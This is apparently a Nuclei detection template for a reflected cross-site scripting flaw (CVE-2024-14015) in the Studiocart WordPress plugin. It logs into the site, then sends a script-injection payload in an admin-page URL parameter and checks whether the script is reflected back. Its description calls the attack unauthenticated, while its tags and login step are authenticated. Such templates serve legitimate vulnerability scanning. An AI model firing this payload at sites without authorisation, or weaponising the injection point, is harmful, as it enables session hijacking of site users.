Studiocart <= 2.9.0 - Cross-Site Scripting

id: CVE-2024-14015

info:
  name: Studiocart <= 2.9.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    The Studiocart plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Attackers can execute scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version beyond 2.9.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-14015
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp,wp-plugin,studiocart,xss,reflected,authenticated

variables:
  payload: '"></script><script>alert(document.domain)</script><script>'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=sc_order&order_type=orders&format_err=1{{payload}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(body, "sc_product") && contains(body, "sc_order")'
        condition: and
# digest: 490a004630440220145d4828e14873fabf4632b90a177ff4ee3b3b2bacab2d4e19e683a03b60f72e02205171c5da7dff756818cbe8914bc684b02fbb725ac5a1df6cf31158fa759afebc:922c64590222798bb761d5b6d8e72950